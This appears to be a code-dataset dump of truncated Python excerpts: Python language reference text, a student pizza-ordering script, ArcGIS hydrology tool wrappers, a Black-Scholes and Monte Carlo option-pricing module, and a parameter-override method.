input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
slot; this should usually be avoided.) If there are any
unfilled slots for which no default value is specified, a "TypeError"
exception is raised. Otherwise, the list of filled slots is used as
the argument list for the call.
**CPython implementation detail:** An implementation may provide
built-in functions whose positional parameters do not have names, even
if they are 'named' for the purpose of documentation, and which
therefore cannot be supplied by keyword. In CPython, this is the case
for functions implemented in C that use "PyArg_ParseTuple()" to parse
their arguments.
If there are more positional arguments than there are formal parameter
slots, a "TypeError" exception is raised, unless a formal parameter
using the syntax "*identifier" is present; in this case, that formal
parameter receives a tuple containing the excess positional arguments
(or an empty tuple if there were no excess positional arguments).
If any keyword argument does not correspond to a formal parameter
name, a "TypeError" exception is raised, unless a formal parameter
using the syntax "**identifier" is present; in this case, that formal
parameter receives a dictionary containing the excess keyword
arguments (using the keywords as keys and the argument values as
corresponding values), or a (new) empty dictionary if there were no
excess keyword arguments.
If the syntax "*expression" appears in the function call, "expression"
must evaluate to an *iterable*. Elements from these iterables are
treated as if they were additional positional arguments. For the call
"f(x1, x2, *y, x3, x4)", if *y* evaluates to a sequence *y1*, ...,
*yM*, this is equivalent to a call with M+4 positional arguments *x1*,
*x2*, *y1*, ..., *yM*, *x3*, *x4*.
A consequence of this is that although the "*expression" syntax may
appear *after* explicit keyword arguments, it is processed *before*
the keyword arguments (and any "**expression" arguments -- see below).
So:
>>> def f(a, b):
... print(a, b)
...
>>> f(b=1, *(2,))
2 1
>>> f(a=1, *(2,))
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: f() got multiple values for keyword argument 'a'
>>> f(1, *(2,))
1 2
It is unusual for both keyword arguments and the "*expression" syntax
to be used in the same call, so in practice this confusion does not
arise.
If the syntax "**expression" appears in the function call,
"expression" must evaluate to a *mapping*, the contents of which are
treated as additional keyword arguments. If a keyword is already
present (as an explicit keyword argument, or from another unpacking),
a "TypeError" exception is raised.
Formal parameters using the syntax "*identifier" or "**identifier"
cannot be used as positional argument slots or as keyword argument
names.
Changed in version 3.5: Function calls accept any number of "*" and
"**" unpackings, positional arguments may follow iterable unpackings
("*"), and keyword arguments may follow dictionary unpackings ("**").
Originally proposed by **PEP 448**.
A call always returns some value, possibly "None", unless it raises an
exception. How this value is computed depends on the type of the
callable object.
If it is---
a user-defined function:
The code block for the function is executed, passing it the
argument list. The first thing the code block will do is bind the
formal parameters to the arguments; this is described in section
Function definitions. When the code block executes a "return"
statement, this specifies the return value of the function call.
a built-in function or method:
The result is up to the interpreter; see Built-in Functions for the
descriptions of built-in functions and methods.
a class object:
A new instance of that class is returned.
a class instance method:
The corresponding user-defined function is called, with an argument
list that is one longer than the argument list of the call: the
instance becomes the first argument.
a class instance:
The class must define a "__call__()" method; the effect is then the
same as if that method was called.
"""
, 'class':
"""Class definitions
*****************
A class definition defines a class object (see section The standard
type hierarchy):
classdef ::= [decorators] "class" classname [inheritance] ":" suite
inheritance ::= "(" [argument_list] ")"
classname ::= identifier
A class definition is an executable statement. The inheritance list
usually gives a list of base classes (see Metaclasses for more
advanced uses), so each item in the list should evaluate to a class
object which allows subclassing. Classes without an inheritance list
inherit, by default, from the base class "object"; hence,
class Foo:
pass
is equivalent to
class Foo(object):
pass
The class's suite is then executed in a new execution frame (see
Naming and binding), using a newly created local namespace and the
original global namespace. (Usually, the suite contains mostly
function definitions.) When the class's suite finishes execution, its
execution frame is discarded but its local namespace is saved. [4] A
class object is then created using the inheritance list for the base
classes and the saved local namespace for the attribute dictionary.
The class name is bound to this class object in the original local
namespace.
The order in which attributes are defined in the class body is
preserved in the new class's "__dict__". Note that this is reliable
only right after the class is created and only for classes that were
defined using the definition syntax.
Class creation can be customized heavily using metaclasses.
Classes can also be decorated: just like when decorating functions,
@f1(arg)
@f2
class Foo: pass
is roughly equivalent to
class Foo: pass
Foo = f1(arg)(f2(Foo))
The evaluation rules for the decorator expressions are the same as for
function decorators. The result is then bound to the class name.
**Programmer's note:** Variables defined in the class definition are
class attributes; they are shared by instances. Instance attributes
can be set in a method with "self.name = value". Both class and
instance attributes are accessible through the notation ""self.name"",
and an instance attribute hides a class attribute with the same name
when accessed in this way. Class attributes can be used as defaults
for instance attributes, but using mutable values there can lead to
unexpected results. Descriptors can be used to create instance
variables with different implementation details.
See also: **PEP 3115** - Metaclasses in Python 3 **PEP 3129** -
Class Decorators
"""
, 'comparisons':
"""Comparisons
***********
Unlike C, all comparison operations in Python have the same priority,
which is lower than that of any arithmetic, shifting or bitwise
operation. Also unlike C, expressions like "a < b < c" have the
interpretation that is conventional in mathematics:
comparison ::= or_expr ( comp_operator or_expr )*
comp_operator ::= "<" | ">" | "==" | ">=" | "<=" | "!="
| "is" ["not"] | ["not"] "in"
Comparisons yield boolean values: "True" or "False".
Comparisons can be chained arbitrarily, e.g., "x < y <= z" is
equivalent to "x < y and y <= z", except that "y" is evaluated only
once (but in both cases "z" is not evaluated at all when "x < y" is
found to be false).
Formally, if *a*, *b*, *c*, ..., *y*, *z* are expressions and *op1*,
*op2*, ..., *opN* are comparison operators, then "a op1 b op2 c ... y
opN z" is equivalent to "a op1 b and b op2 c and ... y opN z", except
that each expression is evaluated at most once.
Note that "a op1 b op2 c" doesn't imply any kind of comparison between
*a* and *c*, so that, e.g., "x < y > z" is perfectly legal (though
perhaps not pretty).
Value comparisons
=================
The operators "<", ">", "==", ">=", "<=", and "!=" compare the values
of two objects. The objects do not need to have the same type.
Chapter Objects, values and types states that objects have a value (in
addition to type and identity). The value of an object is a rather
abstract notion in Python: For example, there is no canonical access
method for an object's value. Also, there is no requirement that the
value of an object should be constructed in a particular way, e.g.
comprised of all its data attributes. Comparison operators implement a
particular notion of what the value of an object is. One can think of
them as defining the value of an object indirectly, by means of their
comparison implementation.
Because all types are (direct or indirect) subtypes of "object", they
inherit the default comparison behavior from "object". Types can
customize their comparison behavior by implementing *rich comparison
methods* like "__lt__()", described in Basic customization.
The default behavior for equality comparison ("==" and "!=") is based
on the identity of the | |
<filename>Final Solution/0478-22-PRE-F-M-19 Task 3 1-2-3.py<gh_stars>1-10
# ** DECLARE CONSTANTS
# These are the options of the various properties of the pizza available
sizesAvailable = ["Small", "Medium", "Large"] # The size of the pizza
basesAvailable = ["Thick", "Thin"] # The type of base of the pizza
toppingsAvailable = ["Pepperoni", "Chicken", "Extra Cheese", "Mushrooms", "Spinach", "Olives"] # The toppings available
maxToppings = 3 # The maximum number of toppings that can be taken
# ** DECLARE VARIABLES
CurrentID = 0 # The running unique ID of the order
ordersCount = 0 # The running total of the number of confirmed orders
close = False # status of more orders
highest = 0.0
highestIndex = 0
lowest = 1000.0
lowestIndex = 0
toppingsSum = 0.0
orderData = [] # Running tracker of all the items of one order
# Initialize the array with all values 0
totalSizes = [0, 0, 0] # Set values for 3 sizes
totalBases = [0, 0] # Set values for 2 bases
totalToppings = [0, 0, 0, 0, 0, 0] # Set values for 6 toppings
# ** TASK 1
# Use a default status "Alter" to customize the pizza
# Input the values of each attribute for count in range( validate them
# Give the customer a choice to alter the order, confirm it OR cancel it
# If they choose to alter, re-input the values
# If they confirm it, provide them with a new order number.
# ** TASK 2
# Increment a counter of number of pizzas if an order is confirmed
# Add the value of the Counters[] to the TotalCounters[]
# Output the number of pizzas ordered.
while (close != True):
status = "Alter" # Default status to input values
# Input for count in range( validate the values
while status == "Alter": # As long as the status is "Alter"
# Reset the running tracker
orderData = [] # Initialize to have 0 toppings
# Output the available options
# Output the sizes
print "\nThe following sizes are available to choose from:"
for count in range(3): # Iterate 3 times for 3 sizes
print sizesAvailable[count] + ',', # Output the available sizes
# Output the bases
print "\n\nThe following bases are available to choose from:"
for count in range(2): # Iterate 2 times for 2 pizza bases
print basesAvailable[count] + ',', # Output the available bases
# Output the toppings
print "\n\nThe following toppings are available to choose from:"
for count in range(6): # Iterate 6 times for 6 toppings
print toppingsAvailable[count] + ',', # Output the available toppings
size = "" # Enable the while loop to run by making the size invalid
# Input and validate the size of the pizza
while (size != "Small") and (size != "Medium") and (size != "Large"): # Validation loop
size = raw_input("\n\nPlease enter the size of the pizza you would like: ") # Input the size
if (size != "Small") and (size != "Medium") and (size != "Large"): # If the size is invalid
print "The size you have entered is invalid. Please re-enter the size from one of the options above." # Print error message and ask for correction
# Unless the size is invalid, break out of the loop
# Input and validate the base of the pizza
base = "" # Enable the while loop to run by making the base invalid
while (base != "Thick") and (base != "Thin"): # Validation loop
base = raw_input("\nPlease enter the pizza base you would like: ") # Input the base
if (base != "Thick") and (base != "Thin"): # If the base is invalid
print "The base you have entered is invalid. Please re-enter the base from one of the options above." # Print error message and ask for correction
# Unless the base is invalid, break out of the loop
# Input and validate the number of toppings the customer wants
print # Input prompt
toppingChoice = 100 # Enable the while loop to run by making the number of toppings invalid
while not ((toppingChoice <= 3) and (toppingChoice >= 0)): # Validation loop
toppingChoice = int(input("How many toppings do you want on your pizza? You may enter any whole number between 0 and 3: ")) # Input the number of toppings the user wants
if not ((toppingChoice <= 3) and (toppingChoice >= 0)): # If the number of toppings is invalid
print "You have entered an invalid number of toppings. Please re-enter any whole number between 0 and 3." # Throw error message and ask for correction
# Unless the number of toppings is greater than 3, break out of the loop
numberOfItems = 3 + toppingChoice # Calculate the total number of items based on the number of toppings
orderData = range(numberOfItems) # Declare an array with as many elements as in the order
# Store the data acquired so far
orderData[0] = size # Store the size
orderData[1] = base # Store the base
orderData[2] = numberOfItems # Store the total number of items
for outsideCount in range(toppingChoice): # Iterate as many times as the toppings taken
# Input for count in and validate the topping of the pizza
topping = "" # Enable the while loop to run by making the topping invalid
while (topping != "Pepperoni") and (topping != "Chicken") and (topping != "Extra Cheese") and (topping != "Mushrooms") and (topping != "Spinach") and (topping != "Olives"): # Validation loop
topping = raw_input("Please enter topping " + str(outsideCount + 1) + " of the pizza you would like: ") # Input the topping
if (topping != "Pepperoni") and (topping != "Chicken") and (topping != "Extra Cheese") and (topping != "Mushrooms") and (topping != "Spinach") and (topping != "Olives"): # If the topping is invalid
print "The topping you have entered is invalid. Please re-enter the topping from one of the options above." # Print error message and ask for correction
# Unless the topping is invalid, break out of the loop
orderData[2 + outsideCount] = topping # Store the validated topping in the array
# Move on to the next topping
status = raw_input("\nDo you want to Alter your order, Confirm or Not proceed? ") # Input whether the customer wants to alter their order, confirm it or cancel it
# Unless they want to alter their order, break out of the loop
# Give the customer a unique order ID if they have confirmed it
if status == "Confirm": # If the customer has confirmed their order
print "\nYour unique order number is: ", CurrentID # Print out the unique ID
CurrentID = CurrentID + 1 # Increment the ID for the next confirmed order
ordersCount = ordersCount + 1 # Increment the counter for confirmed orders
# Record how many of each size has been ordered
for count in range(3): # Iterate 3 times for 3 sizes
if orderData[0] == sizesAvailable[count]: # If a size is recorded
totalSizes[count] = totalSizes[count] + 1 # Increment the counter
# Record how many of each pizza base has been ordered
for count in range(2): # Iterate 2 times for 2 pizza bases
if orderData[1] == basesAvailable[count]: # If a pizza base is recorded
totalBases[count] = totalBases[count] + 1 # Increment the counter
# Record how many of each topping has been ordered
for outsideCount in range(toppingChoice): # Run as many times as the number of toppings taken
for insideCount in range(6): # Iterate 6 times for 6 toppings
if orderData[2 + outsideCount] == toppingsAvailable[insideCount]: # If a topping has been ordered
totalToppings[insideCount] = totalToppings[insideCount] + 1 # Increment the counter
close = input("\nDo you want to exit the program? ") | |
context=None,
gis=None,
estimate=False,
future=False):
"""
.. image:: _static/images/create_watersheds/create_watersheds.png
The ``create_watersheds`` method determines the watershed, or upstream contributing area, for each point
in your analysis layer. For example, suppose you have point features representing locations
of waterborne contamination, and you want to find the likely sources of the contamination.
Since the source of the contamination must be somewhere within the watershed upstream of the
point, you would use this tool to define the watersheds containing the sources of the contaminant.
========================= =========================================================
**Parameter** **Description**
------------------------- ---------------------------------------------------------
input_layer Required point feature layer. The point features used for calculating watersheds.
These are referred to as pour points, because it is the location at which water pours out of the watershed.
See :ref:`Feature Input<FeatureInput>`.
------------------------- ---------------------------------------------------------
search_distance Optional float. The maximum distance to move the location of an input point.
Use search_units to set the units for search_distance.
If your input points are located away from a drainage line, the resulting watersheds
are likely to be very small and not of much use in determining the upstream source of
contamination. In most cases, you want your input points to snap to the nearest drainage
line in order to find the watersheds that flows to a point located on the drainage line.
To find the closest drainage line, specify a search distance. If you do not specify a
search distance, the tool will compute and use a conservative search distance.
To use the exact location of your input point, specify a search distance of zero.
For analysis purposes, drainage lines have been precomputed by Esri using standard
hydrologic models. If there is no drainage line within the search distance, the location
containing the highest flow accumulation within the search distance is used.
------------------------- ---------------------------------------------------------
search_units Optional string. The linear units specified for the search distance.
Choice list: ['Meters', 'Kilometers', 'Feet', 'Miles', 'Yards']
------------------------- ---------------------------------------------------------
source_database Optional string. Keyword indicating the data source resolution that will be used in the analysis.
Choice list: ['Finest', '30m', '90m']
* Finest (Default): Finest resolution available at each location from all possible data sources.
* 30m: The hydrologic source was built from 1 arc second - approximately 30 meter resolution, elevation data.
* 90m: The hydrologic source was built from 3 arc second - approximately 90 meter resolution, elevation data.
------------------------- ---------------------------------------------------------
generalize Optional boolean. Determines if the output watersheds will be smoothed into simpler shapes or conform
to the cell edges of the original DEM.
* True: The polygons will be smoothed into simpler shapes. This is the default.
* False: The edge of the polygons will conform to the edges of the original DEM.
The default value is True.
------------------------- ---------------------------------------------------------
output_name Optional string. Output feature service name. If not provided, a feature collection is returned.
------------------------- ---------------------------------------------------------
context Optional dict. Context contains additional settings that affect task execution. For ``create_watersheds``, there are two settings.
#. Extent (``extent``)-a bounding box that defines the analysis area. Only those points in the ``input_layer``
that intersect the bounding box will be analyzed.
#. Output Spatial Reference (``outSR``) - the output features will be projected into the output spatial reference.
------------------------- ---------------------------------------------------------
gis Optional, the GIS on which this tool runs. If not specified, the active GIS is used.
------------------------- ---------------------------------------------------------
estimate Optional boolean. If True, the estimated number of credits required to run the operation will be returned.
------------------------- ---------------------------------------------------------
future Optional boolean. If True, the result will be a GPJob object and results will be returned asynchronously.
========================= =========================================================
:returns result_layer : feature layer Item if output_name is specified, else Feature Collection.
.. code-block:: python
USAGE EXAMPLE: To create watersheds for Chennai lakes.
lakes_watershed = create_watersheds(lakes_lyr,
search_distance=3,
search_units='Kilometers',
source_database='90m',
output_name='create watersheds')
"""
gis = _arcgis.env.active_gis if gis is None else gis
return gis._tools.featureanalysis.create_watersheds(
input_layer,
search_distance,
search_units,
source_database,
generalize,
output_name,
context,
estimate=estimate, future=future)
def trace_downstream(
input_layer,
split_distance=None,
split_units="Kilometers",
max_distance=None,
max_distance_units="Kilometers",
bounding_polygon_layer=None,
source_database=None,
generalize=True,
output_name=None,
context=None,
gis=None,
estimate=False,
future=False):
"""
.. image:: _static/images/trace_downstream/trace_downstream.png
The ``trace_downstream`` method determines the trace, or flow path, in a downstream direction from the points in your analysis layer.
For example, suppose you have point features representing sources of contamination and you want to determine where in your study
area the contamination will flow. You can use ``trace_downstream`` to identify the path the contamination will take. This trace
can also be divided into individual line segments by specifying a distance value and units. The line being returned can be the
total length of the flow path, a specified maximum trace length, or clipped to area features such as your study area. In many
cases, if the total length of the trace path is returned, it will be from the source all the way to the ocean.
===================================== =========================================================
**Argument** **Description**
------------------------------------- ---------------------------------------------------------
input_layer Required feature layer. The point features used for the starting location of a downstream trace.
See :ref:`Feature Input<FeatureInput>`.
------------------------------------- ---------------------------------------------------------
split_distance Optional float. The trace line will be split into multiple lines where each line is of the specified length.
The resulting trace will have multiple line segments, each with fields FromDistance and ToDistance.
------------------------------------- ---------------------------------------------------------
split_units Optional string. The units used to specify split distance.
Choice list: ['Meters', 'Kilometers', 'Feet' 'Yards', 'Miles'].
The default is 'Kilometers'.
------------------------------------- ---------------------------------------------------------
max_distance Optional float. Determines the total length of the line that will be returned. If you provide a
``bounding_polygon_layer`` to clip the trace, the result will be clipped to the features in ``bounding_polygon_layer``,
regardless of the distance you enter here.
------------------------------------- ---------------------------------------------------------
max_distance_units Optional string. The units used to specify maximum distance.
Choice list: ['Meters', 'Kilometers', 'Feet' 'Yards', 'Miles'].
The default is 'Kilometers'.
------------------------------------- ---------------------------------------------------------
bounding_polygon_layer Optional feature layer. A polygon layer specifying the area(s) where you want the trace
downstreams to be calculated in. For example, if you only want to calculate the trace downstream
with in a county polygon, provide a layer containing the county polygon and the resulting trace
lines will be clipped to the county boundary. See :ref:`Feature Input<FeatureInput>`.
------------------------------------- ---------------------------------------------------------
source_database Optional string. Keyword indicating the data source resolution that will be used in the analysis.
Choice list: ['Finest', '30m', '90m'].
* Finest: Finest resolution available at each location from all possible data sources.
* 30m: The hydrologic source was built from 1 arc second - approximately 30 meter resolution, elevation data.
* 90m: The hydrologic source was built from 3 arc second - approximately 90 meter resolution, elevation data.
The default is 'Finest'.
------------------------------------- ---------------------------------------------------------
generalize Optional boolean. Determines if the output trace downstream lines will be smoothed
into simpler lines or conform to the cell edges of the original DEM.
------------------------------------- ---------------------------------------------------------
output_name Optional string. If provided, the task will create a feature service of the results.
You define the name of the service. If ``output_name`` is not supplied, the task will return a feature collection.
------------------------------------- ---------------------------------------------------------
context Optional string. Context contains additional settings that affect task execution. For ``trace_downstream``, there are two settings.
#. Extent (``extent``) - a bounding box that defines the analysis area. Only those points
in the ``input_layer`` that intersect the bounding box will have a downstream trace generated.
#. Output Spatial Reference (``outSR``) - the output features will be projected into the output spatial reference.
------------------------------------- ---------------------------------------------------------
estimate Optional boolean. If True, the number of credits to run the operation will be returned.
------------------------------------- ---------------------------------------------------------
future Optional boolean. If True, the result will be a GPJob object and results will be returned asynchronously.
===================================== =========================================================
:returns: feature layer collection if ``output_name`` is set, else feature collection.
.. code-block:: python
# USAGE EXAMPLE: To identify the path the water contamination will take.
path = trace_downstream(input_layer=water_source_lyr,
split_distance=2,
split_units='Miles',
max_distance=2,
max_distance_units='Miles',
source_database='Finest',
generalize=True,
output_name='trace downstream')
"""
gis = _arcgis.env.active_gis if gis is None else gis
return gis._tools.featureanalysis.trace_downstream(
| |
import numpy as np
import pandas as pd
import scipy.stats as si
'''
This section is highly dependent upon knowledge of the black & scholes formula
for option pricing and using Monte Carlo methods to price options. There are
a number of terms such as d1, d2, delta, gamma, vega that are specific to
option ricing and I will not add comments to explain what these are. If you
are unfamiliar with this, read something like 'Options, Futures and Other
Derivatives' by <NAME>.
Note however that I use numpy arrays here, so when a calculation is performed,
I am often calculating multiple values at the same time. I assume an input
array containing multiple stock prices is passed in, which results n multiple
price, delta, gamma etx values being calculated and which will later be used
to plot graphs.
This module has two classes:
BlackScholes:
This calculates the price, delta, gamma etc of an option using the B&S Formula
BasicMonteCarloOption:
This calculates the price, delta, gamma etc by using monte carlo methods.
With this class I tend to return 2 argument (not 1) from the functions.
The second argument tends to be the standard deviation. So I may have
(optPrice, optStdDev) = calculateSomeValue( numpyArrayOfStockPrices )
This section is only for European Options and it does not include things such
as interest rate curves, borrow curves, volatility surface etc etc.
(ie it is a simplified version)
'''
class BlackScholes():
# Private Functions
def __init__(self, fltStrike, fltVol, fltRiskFreeRate, fltTimeToMaturity,
boolIsCall):
# Set the variables
self.__fltStrike = fltStrike
self.__fltVol = fltVol
self.__fltRiskFreeRate = fltRiskFreeRate
self.__fltTimeToMaturity = fltTimeToMaturity
self.__boolIsCall = boolIsCall
def __str__(self):
strF = 'EuropeanOption: [Strike:{strike}; Vol:{vol}; '\
'RFRate:{rfrate}; Time:{time}; IsCall:{iscall};]'
return strF.format(strike=self.__fltStrike,
vol=self.__fltVol,
rfrate=self.__fltRiskFreeRate,
time=self.__fltTimeToMaturity,
iscall=self.__boolIsCall)
def __getD1(self, npStock):
npSK = np.log(npStock / self.__fltStrike)
npTopD1 = npSK + (
self.__fltRiskFreeRate
+ (self.__fltVol ** 2) / 2
) * self.__fltTimeToMaturity
npD1 = npTopD1 / (self.__fltVol * np.sqrt(self.__fltTimeToMaturity))
return npD1
def __getD2(self, npStock):
npD1 = self.__getD1(npStock)
npD2 = npD1 - (self.__fltVol * np.sqrt(self.__fltTimeToMaturity))
return npD2
def __getD2FromD1(self, npD1):
npD2 = npD1 - (self.__fltVol * np.sqrt(self.__fltTimeToMaturity))
return npD2
def __getCallPrice(self, npStock):
npD1 = self.__getD1(npStock)
npD2 = self.__getD2FromD1(npD1)
npCall = npStock * si.norm.cdf(npD1)\
- (self.__fltStrike
* np.exp(-self.__fltRiskFreeRate * self.__fltTimeToMaturity)
* si.norm.cdf(npD2))
return npCall
def __getCallDelta(self, npStock):
npD1 = self.__getD1(npStock)
npDelta = si.norm.cdf(npD1)
return npDelta
def __getCallTheta(self, npStock):
npD1 = self.__getD1(npStock)
npD2 = self.__getD2FromD1(npD1)
npArg1 = -(npStock * si.norm.pdf(npD1) * self.__fltVol) \
/ (2 * np.sqrt(self.__fltTimeToMaturity))
npArg2 = -self.__fltRiskFreeRate * self.__fltStrike * np.exp(
-self.__fltRiskFreeRate * self.__fltTimeToMaturity) \
* si.norm.cdf(npD2)
npTheta = (npArg1 + npArg2) / 365
return npTheta
def __getCallRho(self, npStock):
npD2 = self.__getD2(npStock)
npRho = (self.__fltStrike * self.__fltTimeToMaturity * np.exp(
-self.__fltRiskFreeRate * self.__fltTimeToMaturity)
* si.norm.cdf(npD2)) * 0.01
return npRho
def __getPutPrice(self, npStock):
npD1 = self.__getD1(npStock)
npD2 = self.__getD2FromD1(npD1)
npPut = self.__fltStrike * np.exp(
-self.__fltRiskFreeRate * self.__fltTimeToMaturity) \
* si.norm.cdf(-npD2) - npStock * si.norm.cdf(-npD1)
return npPut
def __getPutDelta(self, npStock):
npD1 = self.__getD1(npStock)
npDelta = (si.norm.cdf(npD1) - 1)
return npDelta
def __getPutTheta(self, npStock):
npD1 = self.__getD1(npStock)
npD2 = self.__getD2FromD1(npD1)
npArg1 = -(npStock * si.norm.pdf(npD1) * self.__fltVol) \
/ (2 * np.sqrt(self.__fltTimeToMaturity))
npArg2 = self.__fltRiskFreeRate * self.__fltStrike * np.exp(
-self.__fltRiskFreeRate * self.__fltTimeToMaturity) \
* si.norm.cdf(-npD2)
npTheta = (npArg1 + npArg2) / 365
return npTheta
def __getPutRho(self, npStock):
npD2 = self.__getD2(npStock)
npRho = (- self.__fltStrike * self.__fltTimeToMaturity * np.exp(
-self.__fltRiskFreeRate * self.__fltTimeToMaturity)
* si.norm.cdf(-npD2)) * 0.01
return npRho
# Public Functions
def getOptionPrice(self, npStock):
if self.__boolIsCall:
return self.__getCallPrice(npStock)
else:
return self.__getPutPrice(npStock)
def getOptionDelta(self, npStock):
if self.__boolIsCall:
return self.__getCallDelta(npStock)
else:
return self.__getPutDelta(npStock)
def getOptionGamma(self, npStock):
# Gamma is Call/Put independent
npD1 = self.__getD1(npStock)
n1 = (si.norm.pdf(npD1))
d1 = (npStock * self.__fltVol * np.sqrt(self.__fltTimeToMaturity))
npGamma = n1 / d1
return npGamma
def getOptionVega(self, npStock):
# Vega is Call/Put independent
npD1 = self.__getD1(npStock)
npVega = npStock * (si.norm.pdf(npD1)) \
* np.sqrt(self.__fltTimeToMaturity) / 100
return npVega
def getOptionTheta(self, npStock):
if self.__boolIsCall:
return self.__getCallTheta(npStock)
else:
return self.__getPutTheta(npStock)
def getOptionRho(self, npStock):
if self.__boolIsCall:
return self.__getCallRho(npStock)
else:
return self.__getPutRho(npStock)
class BasicMonteCarloOption():
# Private Functions
def __init__(self, fltStrike, fltVol, fltRiskFreeRate, fltTimeToMaturity,
boolIsCall, intNoIter):
self.__fltStrike = fltStrike
self.__fltVol = fltVol
self.__fltRiskFreeRate = fltRiskFreeRate
self.__fltTimeToMaturity = fltTimeToMaturity
self.__boolIsCall = boolIsCall
self.__intNoIter = intNoIter
def __str__(self):
strF = 'BasicMonteCarloOption: [Strike:{strike}; Vol:{vol}; ' \
'RFRate:{rfrate}; Time:{time}; IsCall:{iscall}; ' \
'NoIter:{noiter}]'
return strF.format(strike=self.__fltStrike, vol=self.__fltVol,
rfrate=self.__fltRiskFreeRate,
time=self.__fltTimeToMaturity,
iscall=self.__boolIsCall,
noiter=self.__intNoIter)
def getOptionPrice(self, npStock):
# Get the random numbers
Z = np.random.standard_normal((1, self.__intNoIter))
# Now get the multipliers to find the final stock price
a1 = Z * self.__fltVol * np.sqrt(self.__fltTimeToMaturity)
a2 = (self.__fltRiskFreeRate - 0.5 * self.__fltVol ** 2) \
* self.__fltTimeToMaturity
Mult = np.exp(a1 + a2)
# For every stock price, get m_intNoIter final stock prices by doing
# a matrix multiplication. We multiply the initial stock price,by
# the multipliers to get the final stock price. I do need to change
# the stocks to a matrix to achive this.
npMatrix = npStock.copy()
npMatrix = np.reshape(npMatrix, (len(npStock), -1))
FinalS = np.matmul(npMatrix, Mult)
# Calculate the payoff
if self.__boolIsCall:
npPayoff = FinalS - self.__fltStrike
else:
npPayoff = self.__fltStrike - FinalS
# Build a matrix of zero's the same size as the payoff matrix.
npZeros = np.zeros(npPayoff.shape)
# Build a matrix of adjusted payoff, where the P&L if floored at zero.
npPayoffAdj = np.maximum(npPayoff, npZeros)
# Get the present value of the monte carlo simulations
npPV = npPayoffAdj * np.exp(
-self.__fltRiskFreeRate * self.__fltTimeToMaturity)
# Calculate the mean for each axis.
npPrice = np.mean(npPV, axis=1)
# Calculate the stdev for each axis.
npSTD = np.std(npPV, axis=1)
# Return the option price.
return (npPrice, npSTD)
def getOptionDelta(self, npStock):
# Get the random numbers
Z = np.random.standard_normal((1, self.__intNoIter))
# Now get the multipliers to find the final stock price
a1 = Z * self.__fltVol * np.sqrt(self.__fltTimeToMaturity)
a2 = (self.__fltRiskFreeRate - 0.5 * self.__fltVol ** 2) \
* self.__fltTimeToMaturity
Mult = np.exp(a1 + a2)
# For every stock price, get m_intNoIter final stock prices by doing
# a matrix multiplication. We multiply the initial stock price,by
# the multipliers to get the final stock price. I do need to change
# the stocks to a matrix to achive this.
npMatrix = npStock.copy()
npMatrix = np.reshape(npMatrix, (len(npStock), -1))
FinalS = np.matmul(npMatrix, Mult)
# Get a bumped stockprice and then calculate the final stockprice
npBump = npMatrix * 0.01
FinalSBump = np.matmul(npMatrix + npBump, Mult)
# Calculate the payoff
if self.__boolIsCall:
npPayoff = FinalS - self.__fltStrike
npPayoffBump = FinalSBump - self.__fltStrike
else:
npPayoff = self.__fltStrike - FinalS
npPayoffBump = self.__fltStrike - FinalSBump
# Build a matrix of zero's the same size as the payoff matrix.
npZeros = np.zeros(npPayoff.shape)
# Build a matrix of adjusted payoff, where the P&L if floored at zero.
npPayoffAdj = np.maximum(npPayoff, npZeros)
npPayoffAdjBump = np.maximum(npPayoffBump, npZeros)
# Get the present value of the monte carlo simulations
npPV = npPayoffAdj * np.exp(
-self.__fltRiskFreeRate * self.__fltTimeToMaturity)
npPVBump = npPayoffAdjBump * np.exp(
-self.__fltRiskFreeRate * self.__fltTimeToMaturity)
# Calculate the delta
npAllDelta = (npPVBump - npPV) / npBump
# Calculate the mean for each axis.
npDelta = np.mean(npAllDelta, axis=1)
# Calculate the stdev for each axis.
npDeltaSTD = np.std(npAllDelta, axis=1)
# Return the option price.
return (npDelta, npDeltaSTD)
def getOptionRho(self, npStock):
# Get the random numbers
Z = np.random.standard_normal((1, self.__intNoIter))
fltBump = 0.0001
fltRiskFreeRateBump = self.__fltRiskFreeRate + fltBump
# Now get the multipliers to find the final stock price
a1 = Z * self.__fltVol * np.sqrt(self.__fltTimeToMaturity)
a2 = (self.__fltRiskFreeRate - 0.5 * self.__fltVol ** 2) \
* self.__fltTimeToMaturity
Mult = np.exp(a1 + a2)
a1 = Z * self.__fltVol * np.sqrt(self.__fltTimeToMaturity)
a2 = (fltRiskFreeRateBump - 0.5 * self.__fltVol ** 2) \
* self.__fltTimeToMaturity
MultBump = np.exp(a1 + a2)
# For every stock price, get m_intNoIter final stock prices by
# doing a matrix multiplication. We multiply the initial stock
# price,by the transpose of the multipliers to get the final stock
# price
npMatrix = npStock.copy()
npMatrix = np.reshape(npMatrix, (len(npStock), -1))
FinalS = np.matmul(npMatrix, Mult)
# Get a bumped stockprice and then calculate the final stockprice
FinalSBump = np.matmul(npMatrix, MultBump)
# Calculate the payoff
if self.__boolIsCall:
npPayoff = FinalS - self.__fltStrike
| |
value None
Returns
-------
None
"""
if parameters is None:
parameters = self
return parameters.set_path(
path=self._translated_path(path),
new_value=new_value
)
def override(self, override):
"""Override container content recursively.
Parameters
----------
override : dict, str
Depending type following is done:
- If dict given, this is used directly to override parameters in the container.
- If str is given which is a filename of existing file on disk, parameter file is loaded and it is used to override container parameters
- If str is given which contains JSON formatted parameters, content is used to override container parameters
Raises
------
ImportError:
JSON import failed
ValueError:
Not JSON formatted string given
Returns
-------
self
"""
if isinstance(override, dict):
self.merge(override=override)
elif isinstance(override, str) and os.path.isfile(override):
self.merge(override=ParameterContainer(filename=override).load())
elif isinstance(override, str):
try:
try:
import ujson as json
except ImportError:
try:
import json
except ImportError:
message = '{name}: Unable to import json module'.format(
name=self.__class__.__name__
)
self.logger.exception(message)
raise ImportError(message)
self.merge(override=json.loads(override))
except:
message = '{name}: Not JSON formatted string given'.format(
name=self.__class__.__name__
)
self.logger.exception(message)
raise ValueError(message)
return self
def _process_method_parameters(self, parameters, section):
"""Process methods and recipes in the section
Processing rules for fields:
- "method" => search for parameters from [section]_method_parameters -section
- "recipe" => parse recipe and search for parameters from [section]_method_parameters -section
- "\*recipe" => parse recipe
Parameters
----------
parameters : dict
Parameter dictionary
section : str
Section name
Raises
------
ValueError:
Invalid method for parameter field
Returns
-------
self
"""
if section in parameters and parameters[section] and isinstance(parameters[section], dict):
# Get section name for method parameters
section_method_parameters = self._method_parameter_section(
section=section,
parameters=parameters
)
# Inject method parameters
if self.field_labels['LABEL'] in parameters[section]:
if (section_method_parameters in parameters and parameters[section][self.field_labels['LABEL']] in parameters[section_method_parameters]):
self.set_path_translated(
